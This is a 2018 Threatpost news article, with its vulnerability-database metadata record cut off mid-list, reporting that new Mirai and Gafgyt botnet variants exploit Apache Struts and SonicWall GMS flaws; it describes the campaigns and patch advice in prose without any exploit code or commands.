Mirai, Gafgyt Botnets Return to Target Infamous Apache Struts, SonicWall Flaws

2018-09-10T14:23:09

Description

Researchers have discovered new variants for the infamous Mirai and Gafgyt IoT botnets – now targeting well-known vulnerabilities in Apache Struts and SonicWall. The new Mirai strain targets the Apache Struts flaw associated with the 2017 Equifax breach, while the Gafgyt variant uses a newly-disclosed glitch impacting older, unsupported versions of SonicWall’s Global Management System, according to researchers with Palo Alto Networks in a [Sunday ](<https://researchcenter.paloaltonetworks.com/2018/09/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/>)post. “Here we’re seeing Mirai and Gafgyt variants targeting systems mostly seen in enterprises,” Ruchna Nigam, researcher with Palo Alto Networks, told Threatpost. “Ultimately, future trends are open to speculation, but we know that targeting enterprise links offers bigger bandwidth from a DDoS perspective. For now, it looks that the attackers may be doing a test run on the efficacy of using different vulnerabilities, with the intention of spotting ones that herd the maximum number of bots, affording them greater firepower for a DDoS.” **Mirai Evolves** Researchers said that they discovered samples of a Mirai variant on Sept. 7 incorporating exploits that targeted 16 separate vulnerabilities. The variant notably exploits the critical arbitrary command-execution flaw in Apache Struts ([CVE-2017-5638](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>)) that was patched in March 2017. This marks the first known instance of Mirai targeting a vulnerability in Apache Struts, researchers said. Attackers could use specially crafted content-type, content-disposition or content-length HTTP headers to launch an arbitrary command-execution attack. Though a patch has been available for over a year now, many consumers may not have updated their systems – an issue that led to the already-patched [vulnerability](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>) being responsible for the Equifax breach last summer that impacted 147 million consumers. Flaws in Apache Struts have been actively exploited in the wild in other recent campaigns; these include a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution (CVE-2018-11776) [vulnerability](<https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/>), which was patched in August. The other 15 vulnerabilities targeted by the newest Mirai strain have been incorporated into the botnet in the past, including a Linksys remote code-execution flaw in Linksys E-Series devices, a Vacron NVR remote code-execution glitch, a remote code-execution issue in D-Link devices, remote code-execution vulnerabilities in CCTVs and DVRs from up to 70 vendors, and a flaw (CVE-2017-6884) in Zyxel routers. Unit 42 also found that the domain currently hosting these Mirai samples previously resolved to a different IP address during the month of August — an IP address hosting a new version of Gafgyt as well. **Gafgyt Adds to Bag of Tricks** In August, the observed IP was “intermittently hosting samples of Gafgyt that incorporated an exploit against CVE-2018-9866, a SonicWall vulnerability affecting older versions of SonicWall Global Management System (GMS),” according to Nigam. The targeted vulnerability ([CVE-2018-9866](<https://nvd.nist.gov/vuln/detail/CVE-2018-9866>)) exists in the lack of validation of user-supplied parameters pass to XML-RPC calls on SonicWall Global Management System (GMS) virtual appliances, allowing remote users to execute arbitrary code. This vulnerability affects older, unsupported GMS versions, including 8.1 and earlier (the flaw is not present in supported versions). A Metasploit module was first [published](<https://www.exploit-db.com/exploits/45124/>) earlier this summer for the flaw; SonicWall then published a [public advisory](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0007>) about the critical issue July 17. SonicWall has been notified of this latest development with Gafgyt, researchers said. “The vulnerability disclosed in this post is not an announcement of a new vulnerability in SonicWall GMS,” a SonicWall spokesperson told Threatpost. “The issue referenced only affects an older version of the GMS software (version 8.1) which was replaced by version 8.2 in December 2016. Customers and partners running GMS version 8.2 and above are protected against this vulnerability. Customers still using GMS version 8.1 should apply a hotfix supplied by SonicWall in August 2018 and plan for an immediate upgrade, as GMS 8.1 went out of support in February 2018.” The Gafgyt botnet exploits a range of IoT flaws, including other issues in Huawei, GPON and D-Link devices. Once in, it then fetches an update from <HTTP_SERVER>, saves it to <FILE_LOCATION>, and installs the update. After that, the botnet launches a Blacknurse DDoS attack, an attack that involves ICMP Type 3 Code 3 packets causing high CPU loads first discovered in November 2016. “One thing that stood out was the Gafgyt variant having support for the BlackNurse DDoS attack method,” Ruchna told us. “The earliest samples I have seen supporting this DDoS method are from September 2017.” **Continued Development** The discovery of new targeted vuln comes after it was revealed in July that Mirai and Gafgyt were actively launching two IoT/Linux botnet [campaigns](<https://threatpost.com/d-link-dasan-routers-under-attack-in-yet-another-assault/134255/>), exploiting the [CVE-2018-10562 and CVE-2018-10561 bugs in Dasan routers](<https://threatpost.com/millions-of-home-fiber-routers-vulnerable-to-complete-takeover/131593/>). In October 2016, the world was introduced to Mirai when it [overwhelmed servers](<https://threatpost.com/dyn-ddos-could-have-topped-1-tbps/121609/>) at global domain provider Dynamic Network Services (Dyn); that led to the blockage of more than 1,200 websites, including Netflix and Twitter. The Mirai source code was then released in Oct. 2016, with Mirai variants continuing to pop up left and right since then. Most recently, in April, a variant of the Mirai [botnet](<https://threatpost.com/mirai-variant-targets-financial-sector-with-iot-ddos-attacks/131056/>) was used to launch a series of DDoS campaigns against financial sector businesses, while in January, researchers identified a variant called [Satori (Mirai Okiru)](<https://threatpost.com/satori-author-linked-to-new-mirai-variant-masuta/129640/>).

{"id": "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1", "vendorId": null, "type": "threatpost", "bulletinFamily": "info", "title": "Mirai, Gafgyt Botnets Return to Target Infamous Apache Struts, SonicWall Flaws", "description": "Researchers have discovered new variants for the infamous Mirai and Gafgyt IoT botnets \u2013 now targeting well-known vulnerabilities in Apache Struts and SonicWall.\n\nThe new Mirai strain targets the Apache Struts flaw associated with the 2017 Equifax breach, while the Gafgyt variant uses a newly-disclosed glitch impacting older, unsupported versions of SonicWall\u2019s Global Management System, according to researchers with Palo Alto Networks in a [Sunday ](<https://researchcenter.paloaltonetworks.com/2018/09/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/>)post.\n\n\u201cHere we\u2019re seeing Mirai and Gafgyt variants targeting systems mostly seen in enterprises,\u201d Ruchna Nigam, researcher with Palo Alto Networks, told Threatpost. \u201cUltimately, future trends are open to speculation, but we know that targeting enterprise links offers bigger bandwidth from a DDoS perspective. For now, it looks that the attackers may be doing a test run on the efficacy of using different vulnerabilities, with the intention of spotting ones that herd the maximum number of bots, affording them greater firepower for a DDoS.\u201d\n\n**Mirai Evolves**\n\nResearchers said that they discovered samples of a Mirai variant on Sept. 7 incorporating exploits that targeted 16 separate vulnerabilities.\n\nThe variant notably exploits the critical arbitrary command-execution flaw in Apache Struts ([CVE-2017-5638](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>)) that was patched in March 2017. This marks the first known instance of Mirai targeting a vulnerability in Apache Struts, researchers said. Attackers could use specially crafted content-type, content-disposition or content-length HTTP headers to launch an arbitrary command-execution attack.\n\nThough a patch has been available for over a year now, many consumers may not have updated their systems \u2013 an issue that led to the already-patched [vulnerability](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>) being responsible for the Equifax breach last summer that impacted 147 million consumers.\n\nFlaws in Apache Struts have been actively exploited in the wild in other recent campaigns; these include a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution (CVE-2018-11776) [vulnerability](<https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/>), which was patched in August.\n\nThe other 15 vulnerabilities targeted by the newest Mirai strain have been incorporated into the botnet in the past, including a Linksys remote code-execution flaw in Linksys E-Series devices, a Vacron NVR remote code-execution glitch, a remote code-execution issue in D-Link devices, remote code-execution vulnerabilities in CCTVs and DVRs from up to 70 vendors, and a flaw (CVE-2017-6884) in Zyxel routers.\n\nUnit 42 also found that the domain currently hosting these Mirai samples previously resolved to a different IP address during the month of August \u2014 an IP address hosting a new version of Gafgyt as well.\n\n**Gafgyt Adds to Bag of Tricks**\n\nIn August, the observed IP was \u201cintermittently hosting samples of Gafgyt that incorporated an exploit against CVE-2018-9866, a SonicWall vulnerability affecting older versions of SonicWall Global Management System (GMS),\u201d according to Nigam.\n\nThe targeted vulnerability ([CVE-2018-9866](<https://nvd.nist.gov/vuln/detail/CVE-2018-9866>)) exists in the lack of validation of user-supplied parameters pass to XML-RPC calls on SonicWall Global Management System (GMS) virtual appliances, allowing remote users to execute arbitrary code.\n\nThis vulnerability affects older, unsupported GMS versions, including 8.1 and earlier (the flaw is not present in supported versions). A Metasploit module was first [published](<https://www.exploit-db.com/exploits/45124/>) earlier this summer for the flaw; SonicWall then published a [public advisory](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0007>) about the critical issue July 17.\n\nSonicWall has been notified of this latest development with Gafgyt, researchers said.\n\n\u201cThe vulnerability disclosed in this post is not an announcement of a new vulnerability in SonicWall GMS,\u201d a SonicWall spokesperson told Threatpost. \u201cThe issue referenced only affects an older version of the GMS software (version 8.1) which was replaced by version 8.2 in December 2016. Customers and partners running GMS version 8.2 and above are protected against this vulnerability. Customers still using GMS version 8.1 should apply a hotfix supplied by SonicWall in August 2018 and plan for an immediate upgrade, as GMS 8.1 went out of support in February 2018.\u201d\n\nThe Gafgyt botnet exploits a range of IoT flaws, including other issues in Huawei, GPON and D-Link devices.\n\nOnce in, it then fetches an update from <HTTP_SERVER>, saves it to <FILE_LOCATION>, and installs the update. After that, the botnet launches a Blacknurse DDoS attack, an attack that involves ICMP Type 3 Code 3 packets causing high CPU loads first discovered in November 2016.\n\n\u201cOne thing that stood out was the Gafgyt variant having support for the BlackNurse DDoS attack method,\u201d Ruchna told us. \u201cThe earliest samples I have seen supporting this DDoS method are from September 2017.\u201d\n\n**Continued Development**\n\nThe discovery of new targeted vuln comes after it was revealed in July that Mirai and Gafgyt were actively launching two IoT/Linux botnet [campaigns](<https://threatpost.com/d-link-dasan-routers-under-attack-in-yet-another-assault/134255/>), exploiting the [CVE-2018-10562 and CVE-2018-10561 bugs in Dasan routers](<https://threatpost.com/millions-of-home-fiber-routers-vulnerable-to-complete-takeover/131593/>).\n\nIn October 2016, the world was introduced to Mirai when it [overwhelmed servers](<https://threatpost.com/dyn-ddos-could-have-topped-1-tbps/121609/>) at global domain provider Dynamic Network Services (Dyn); that led to the blockage of more than 1,200 websites, including Netflix and Twitter. The Mirai source code was then released in Oct. 2016, with Mirai variants continuing to pop up left and right since then.\n\nMost recently, in April, a variant of the Mirai [botnet](<https://threatpost.com/mirai-variant-targets-financial-sector-with-iot-ddos-attacks/131056/>) was used to launch a series of DDoS campaigns against financial sector businesses, while in January, researchers identified a variant called [Satori (Mirai Okiru)](<https://threatpost.com/satori-author-linked-to-new-mirai-variant-masuta/129640/>).\n", "published": "2018-09-10T14:23:09", "modified": "2018-09-10T14:23:09", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://threatpost.com/mirai-gafgyt-botnets-return-to-target-infamous-apache-struts-sonicwall-flaws/137309/", "reporter": "Lindsey O'Donnell", "references": ["https://researchcenter.paloaltonetworks.com/2018/09/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/", "https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/", "https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/", "https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/", "https://nvd.nist.gov/vuln/detail/CVE-2018-9866", "https://www.exploit-db.com/exploits/45124/", "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0007", "https://threatpost.com/d-link-dasan-routers-under-attack-in-yet-another-assault/134255/", "https://threatpost.com/millions-of-home-fiber-routers-vulnerable-to-complete-takeover/131593/", "https://threatpost.com/dyn-ddos-could-have-topped-1-tbps/121609/", "https://threatpost.com/mirai-variant-targets-financial-sector-with-iot-ddos-attacks/131056/", "https://threatpost.com/satori-author-linked-to-new-mirai-variant-masuta/129640/"], "cvelist": ["CVE-2017-5638", "CVE-2017-6884", "CVE-2018-10561", "CVE-2018-10562", "CVE-2018-11776", "CVE-2018-9866"], "immutableFields": [], "lastseen": "2019-05-30T05:51:10", "viewCount": 370, "enchantments": {"score": {"value": 0.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:23A2DE4EE8CE0AE43558095CBB5694B1"]}, {"type": "atlassian", "idList": ["ATLASSIAN:BAM-18242", "ATLASSIAN:CWD-4879", "BAM-18242", "CWD-4879"]}, {"type": "attackerkb", "idList": ["AKB:0535B80A-2642-4B04-B2FA-701CB7556A60", "AKB:1A9CCD3B-5055-4110-9513-247FCDC58E69", "AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:4AA28DD7-15C7-4892-96A3-0190EA268037", "AKB:812ED357-C31F-4733-AFDA-96FACDD8A486", "AKB:A8B25CF8-4C17-4A7A-A4F2-C89EC89A8205", "AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080"]}, {"type": "canvas", "idList": ["STRUTS_OGNL"]}, {"type": "cert", "idList": ["VU:834067"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0197", "CPAI-2017-0676", "CPAI-2018-0458", "CPAI-2018-0459", "CPAI-2018-0844", "CPAI-2018-0849", "CPAI-2018-0983"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2017-5638", "CISA-KEV-CVE-2018-10561", "CISA-KEV-CVE-2018-10562", "CISA-KEV-CVE-2018-11776"]}, {"type": "cisco", "idList": ["CISCO-SA-20170310-STRUTS2", "CISCO-SA-20180823-APACHE-STRUTS"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:C2B8B89ADB85BB41095EAA7D88C0E350"]}, {"type": "cve", "idList": ["CVE-2017-5638", "CVE-2017-6884", "CVE-2018-10561", "CVE-2018-10562", "CVE-2018-11776", "CVE-2018-9866"]}, {"type": "dsquare", "idList": ["E-666"]}, {"type": "exploitdb", "idList": ["EDB-ID:41782", "EDB-ID:45260", "EDB-ID:45367", "EDB-ID:46469"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:1F2B9BFD5A42DD5C9B0CEA473ED8A8CE", "EXPLOITPACK:2F1C07ED066A254E4CE23468DEBAAEBA", "EXPLOITPACK:C890361C9DA2FA0264352384567E504E"]}, {"type": "f5", "idList": ["F5:K43451236", "F5:K60499474"]}, {"type": "fireeye", "idList": ["FIREEYE:3CF3A3DF17A5FD20D5E05C24F6DBC54B"]}, {"type": "github", "idList": ["GHSA-CR6J-3JP9-RW65", "GHSA-J77Q-2QQG-6989", "GITHUB:0519EA92487B44F364A1B35C85049455"]}, {"type": "githubexploit", "idList": ["3926D602-9F67-5EF7-B2D1-A6B2716E1DF5", "4B524E35-6179-5923-8FEE-CFFDB1F046D9", "CD8CABD7-BE65-5434-B682-F73ABA737C65"]}, {"type": "hackerone", "idList": ["H1:212022", "H1:212985", "H1:213069"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170316-01-STRUTS2"]}, {"type": "ibm", "idList": ["02304D05D897B568E77C8953094F5914F389089362655D2AB68B096E3F3418DC", "0766EE3C620AAAF614D24B4B93352C6C94F10148776C7854787A45858D29E32F", "20D334DF630C3C7B5490CC97E9EB2E76B4108FD56753DB19039AF6E0DE79CB63", "47D48C5A9F3802E168F3775B67FEF0A4B25692C1BE0EB29698F35ECDF8F0CD7B", "48F6A099D2817EC515107FFC49C4E17438FAC35AB50A0F0C6F0B86E2F20FECE3", "546F05697B8F700EEF28B598121A8A3351E168124EB0852E39278EAE7A99C11B", "6470A30C25E8E98A770393E4946FDE7CFE3362A1DD3B87E75F8DB1F7CE3E88A5", "709EFBBA0822EBB77C07CD194232C954374F9FDFBE66E10E5A72224A58470EAA", "71763DB8BA3B87C5175E4ED1BF88B5F20D4D7107BB02006612C8229371E7C9F4", "7C42BBDFFC97D2C8E3BEC4BE79A23F40E78C2650B91FD356C831E42D0B7EE5EF", "7E0744D5936EDC5F018B0850D801B665D388060D6A81B986BC7AD81C9A78C0EE", "7E0CCCCB457D8A77AB9E189B336C99165EE3DEBFD72C3969F0C1103ED1D1CC6D", "8D92F3D2DF6A11349A2815C9DBFEE8CEFA4D5B034DC3477EAF30879571A440D4", "B7DFEA0F0D26A9AEA7F776C2117CB1186584920235B808CDC32E52053CB3C6B0", "BF4651008A331C7D796A1E09F830D542352CF251871DBEED396D2CE654058F5A", "D769235D102AD19A73D51C968FFD8889D9656A19C29D4BE9C66233A668FC8B7A", "EF22A73E167DAD8921F1B5310AD0D0D34493E613208B9FFE7D6DF59B309A1D62", "F1072FE090DABD963C764C2E009454B24AB02021B54C8519F4195C5ABC6E2FF5"]}, {"type": "ics", "idList": ["AA20-133A"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7", "IMPERVABLOG:5E50E2263AEAFE98B90E01B16AA73334", "IMPERVABLOG:697E34BE77BECD65BF763ECF92DD1B9F", "IMPERVABLOG:6BF557CA0830C9058E2409E8C914366C", "IMPERVABLOG:9AF395FCAE299375F787DBC7B797E713", "IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "IMPERVABLOG:CD196CDD794CCCE3719A9D38DA5BE417", "IMPERVABLOG:DA39045C8E700086C560AAFFDBA589A6", "IMPERVABLOG:E9D83907E76B2B468512918F211FB65E", "IMPERVABLOG:F2DBFC086ED3B70700CD22E02FB39FC8"]}, {"type": "kitploit", "idList": ["KITPLOIT:1841841790447853746", "KITPLOIT:2304674796555328667", "KITPLOIT:4583746754784092967", "KITPLOIT:4611207874033525364", "KITPLOIT:5052987141331551837", "KITPLOIT:5230099254245458698", "KITPLOIT:5420210148456420402", "KITPLOIT:7013881512724945934", "KITPLOIT:7835941952769002973", "KITPLOIT:8672599587089685905", "KITPLOIT:8708017483803645203", "KITPLOIT:9079806502812490909"]}, {"type": "krebs", "idList": ["KREBS:B3A2371A1AB31AB3CE2E3F1B2243FDC6", "KREBS:EE70929DE902D9B233E209B73C1AD4A0"]}, {"type": "lenovo", "idList": ["LENOVO:PS500093-APACHE-STRUTS-OPEN-SOURCE-FRAMEWORK-REMOTE-CODE-EXECUTION-NOSID", "LENOVO:PS500093-NOSID"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:4993027161793E66024E0B42522BB53D"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-MULTI-HTTP-STRUTS2_NAMESPACE_OGNL-"]}, {"type": "mmpc", "idList": ["MMPC:0FBB61490D4A94C83AEE14DDEE722297"]}, {"type": "mssecure", "idList": ["MSSECURE:0FBB61490D4A94C83AEE14DDEE722297"]}, {"type": "myhack58", "idList": ["MYHACK58:62201784024", "MYHACK58:62201784026", "MYHACK58:62201784086", "MYHACK58:62201784379", "MYHACK58:62201786819", "MYHACK58:62201890758", "MYHACK58:62201891264", "MYHACK58:62201891267", "MYHACK58:62201892188", "MYHACK58:62201993410"]}, {"type": "nessus", "idList": ["700055.PRM", "CISCO-SA-20180823-APACHE-STRUTS-CUPS.NASL", "CISCO-SA-20180823-APACHE-STRUTS-ISE.NASL", "CISCO-SA-20180823-APACHE-STRUTS-UCM.NASL", "GPON_CVE-2018-10561.NBIN", "GPON_CVE-2018-10562.NBIN", "GPON_CVE-2019-3919.NBIN", "GPON_CVE-2019-3920.NBIN", "MYSQL_ENTERPRISE_MONITOR_3_3_3_1199.NASL", "MYSQL_ENTERPRISE_MONITOR_8_0_3.NASL", "ORACLE_ENTERPRISE_MANAGER_JUL_2020_CPU.NASL", "ORACLE_WEBCENTER_SITES_APR_2017_CPU.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_APR_2017.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_JUL_2017.NASL", "ORACLE_WEBLOGIC_SERVER_CVE-2017-9805.NBIN", "SELLIGENT_MESSAGE_STUDIO_RCE.NBIN", "STRUTS_2_5_10_1_RCE.NASL", "STRUTS_2_5_10_1_WIN_LOCAL.NASL", "STRUTS_2_5_17.NASL", "STRUTS_2_5_17_RCE.NASL", "WEB_APPLICATION_SCANNING_112726", "WEB_APPLICATION_SCANNING_112727"]}, {"type": "nmap", "idList": ["NMAP:HTTP-VULN-CVE2017-5638.NSE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106640", "OPENVAS:1361412562310106646", "OPENVAS:1361412562310106647", "OPENVAS:1361412562310106652", "OPENVAS:1361412562310106653", "OPENVAS:1361412562310106736", "OPENVAS:1361412562310108771", "OPENVAS:1361412562310108792", "OPENVAS:1361412562310113170", "OPENVAS:1361412562310140180", "OPENVAS:1361412562310140190", "OPENVAS:1361412562310140229", "OPENVAS:1361412562310141398", "OPENVAS:1361412562310810748", "OPENVAS:1361412562310811244", "OPENVAS:1361412562310813786"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2017", "ORACLE:CPUJAN2019", "ORACLE:CPUJUL2017", "ORACLE:CPUJUL2020", "ORACLE:CPUOCT2018"]}, {"type": "osv", "idList": ["OSV:GHSA-CR6J-3JP9-RW65", "OSV:GHSA-J77Q-2QQG-6989"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:141576", "PACKETSTORM:141630", "PACKETSTORM:141900", "PACKETSTORM:147482", "PACKETSTORM:149086", "PACKETSTORM:149087", "PACKETSTORM:149277"]}, {"type": "pentestit", "idList": ["PENTESTIT:C47AA6D1808026ACA45B1AD1CF25CA3B", "PENTESTIT:F5DFB26B34C75683830E664CBD58178F"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:072B2FAC9B9B391A9AAB97CB87BCCB8C", "QUALYSBLOG:110CC96D8440CC2A1EA0521D300634ED", "QUALYSBLOG:1A5EE9D9F7F017B2137FF614703A8605", "QUALYSBLOG:22DFA98A7ED25A67B3D38EAAE5C82A9E", "QUALYSBLOG:5C311FA52DD78D7015076D492F321DB0", "QUALYSBLOG:5E5409E093DE06FE967B988870D82540", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:AB2325C5FBED5CF55517445600D470C1"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:396ACAA896DDC62391C1F6CBEDA04085"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:078B46BBA3057CDE37845D48479CC3DD"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-5638", "RH:CVE-2018-11776"]}, {"type": "saint", "idList": ["SAINT:01D1CBFEFCD799FC1DCF4DD30F44F248", "SAINT:484D58D595B8F6CEE787306160971308", "SAINT:966010900F7632E797C552D31C2BB53A"]}, {"type": "securelist", "idList": ["SECURELIST:2F75371B5752C888430A598DF749FD1A"]}, {"type": "seebug", "idList": ["SSV:92746", "SSV:92804", "SSV:97258"]}, {"type": "talosblog", "idList": ["TALOSBLOG:991CC85C1D7CC3CD70110C7FAE123FAC", "TALOSBLOG:DAD87115458AF1FB5EDF5A2BB21D8AB9", "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB", "TALOSBLOG:E8F926D413AF8A060A5CA7289C0EAD20", "TALOSBLOG:EAA71FE2CFAB05696E23A5F67435416C"]}, {"type": "thn", "idList": ["THN:2707247140A4F620671B33D68FEB1EA9", "THN:3F47D7B66C8A65AB31FAC5823C96C34D", "THN:66C2DBEE768691DF8BF72CAE39867B68", "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "THN:72352D205E5586C5585536F8661A10E4", "THN:7FD924637D99697D78D53283817508DA", "THN:89C2482FECD181DD37C6DAEEB7A66FA9", "THN:9C8C2D4F8CFDDE01FAE5FF52244A5073", "THN:ACD3479531482E2CA5A8E15EB6B47523", "THN:AF93AEDBDE6169AD1163D53979A4EA04", "THN:EE172E24E32A85AABDE52F47866324C6"]}, {"type": "threatpost", "idList": ["THREATPOST:0308A7143D92E14583CCD684912ABD67", "THREATPOST:08BA9FD6E2245EA011F6C29F24929679", "THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "THREATPOST:0FC293825070B81036932BDB41D793B5", "THREATPOST:12E93CDF8BAC1B158CE1737E859FDD80", "THREATPOST:1C2F8B65F8584E9BF67617A331A7B993", "THREATPOST:1F0994F898084346360FB7C6EFEC201C", "THREATPOST:2F30C320035805DB537579B86877517E", "THREATPOST:31661FC1D8CDC4988A6B8EB802933A7B", "THREATPOST:375A1BFC29F5B279C4D5E461D79CE4AA", "THREATPOST:3DB647F38E79C8BDF5846F520D041C7C", "THREATPOST:477B6029652B76463B5C5B7155CDF736", "THREATPOST:54ECD02964DEF33573316A94BCE772BD", "THREATPOST:5ADABEB29891532ECFF2D6ABD99CAED4", "THREATPOST:5E633FD1C6A5B5BB74F1B6A8399001A2", "THREATPOST:6495B216452F8FF8CDF9A8F13AD41168", "THREATPOST:73B0A9668B2D256140F8DDF19E2E6238", "THREATPOST:76BC692CF25A0009598D6BE4E626ABD9", "THREATPOST:7B2EAFA107D335014D553D78946C453E", "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:812C0E3D711FC77AF4348016C7A094D2", "THREATPOST:87897784F4B89A5B9E8CE18E2324CC70", "THREATPOST:962241D6EFDC7F82640BA9171D82D0B7", "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "THREATPOST:9F1389C4D97BAD7FDE2519A42E4594E2", "THREATPOST:A45826A8CDA7058392C4901D6AAD15F1", "THREATPOST:A76574D355121BF2CD247CC2DEB6022B", "THREATPOST:AACAA4F654495529E053D43901F00A81", "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "THREATPOST:B7F31FCDC8936516C077D39FEF9235AA", "THREATPOST:BE0A86BAF05C9501D981BE19F3BB40AC", "THREATPOST:BFFC84BE9B4393A9F11FFBECEC203286", "THREATPOST:CB1132219D5713747CDA17DB009B4B24", "THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A", "THREATPOST:D5150098043DAE7CDF2E31618C33F5D2", "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "THREATPOST:DC4DAA2C2F91148A88C3494B6E55F309", "THREATPOST:E984089A4842B564B374B807AF915A44", "THREATPOST:F4E175435A7C5D2A4F16D46A939B175E"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:5232F354244FCA9F40053F10BE385E28", "TRENDMICROBLOG:5DA0AA0203F450ED9FF0CB21A89017BB", "TRENDMICROBLOG:71F44A4A56FE1111907DD39C26B46152", "TRENDMICROBLOG:F79486D4EB7A8032A33EF8200A559E62"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-5638", "UB:CVE-2018-11776"]}, {"type": "vmware", "idList": ["VMSA-2017-0004", "VMSA-2017-0004.7"]}, {"type": "zdt", "idList": ["1337DAY-ID-27300", "1337DAY-ID-27316", "1337DAY-ID-27484", "1337DAY-ID-30298", "1337DAY-ID-30956", "1337DAY-ID-30965", "1337DAY-ID-30966", "1337DAY-ID-31056"]}]}, "backreferences": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:23A2DE4EE8CE0AE43558095CBB5694B1"]}, {"type": "atlassian", "idList": ["ATLASSIAN:BAM-18242", "ATLASSIAN:CWD-4879"]}, {"type": "attackerkb", "idList": ["AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:4AA28DD7-15C7-4892-96A3-0190EA268037", "AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080"]}, {"type": "canvas", "idList": ["STRUTS_OGNL"]}, {"type": "cert", "idList": ["VU:834067"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0197", "CPAI-2017-0676", "CPAI-2018-0458", "CPAI-2018-0459", "CPAI-2018-0844", "CPAI-2018-0849", "CPAI-2018-0983"]}, {"type": "cisco", "idList": ["CISCO-SA-20170310-STRUTS2"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:C2B8B89ADB85BB41095EAA7D88C0E350"]}, {"type": "cve", "idList": ["CVE-2017-5638", "CVE-2017-6884"]}, {"type": "dsquare", "idList": ["E-666"]}, {"type": "exploitdb", "idList": ["EDB-ID:41782"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:1F2B9BFD5A42DD5C9B0CEA473ED8A8CE"]}, {"type": "f5", "idList": ["F5:K43451236"]}, {"type": "fireeye", "idList": ["FIREEYE:3CF3A3DF17A5FD20D5E05C24F6DBC54B"]}, {"type": "github", "idList": ["GHSA-CR6J-3JP9-RW65", "GHSA-J77Q-2QQG-6989"]}, {"type": "githubexploit", "idList": ["B41082A1-4177-53E2-A74C-8ABA13AA3E86"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170316-01-STRUTS2"]}, {"type": "ibm", "idList": ["B7DFEA0F0D26A9AEA7F776C2117CB1186584920235B808CDC32E52053CB3C6B0"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "IMPERVABLOG:DA39045C8E700086C560AAFFDBA589A6"]}, {"type": "kitploit", "idList": ["KITPLOIT:1841841790447853746", "KITPLOIT:2304674796555328667", "KITPLOIT:4583746754784092967", "KITPLOIT:9079806502812490909"]}, {"type": "krebs", "idList": ["KREBS:EE70929DE902D9B233E209B73C1AD4A0"]}, {"type": "lenovo", "idList": ["LENOVO:PS500093-NOSID"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:4993027161793E66024E0B42522BB53D"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/STRUTS2_CONTENT_TYPE_OGNL"]}, {"type": "myhack58", "idList": ["MYHACK58:62201784024", "MYHACK58:62201784026", "MYHACK58:62201784086", "MYHACK58:62201784379"]}, {"type": "nessus", "idList": ["CISCO-SA-20180823-APACHE-STRUTS-ISE.NASL", "STRUTS_2_5_10_1_WIN_LOCAL.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106640", 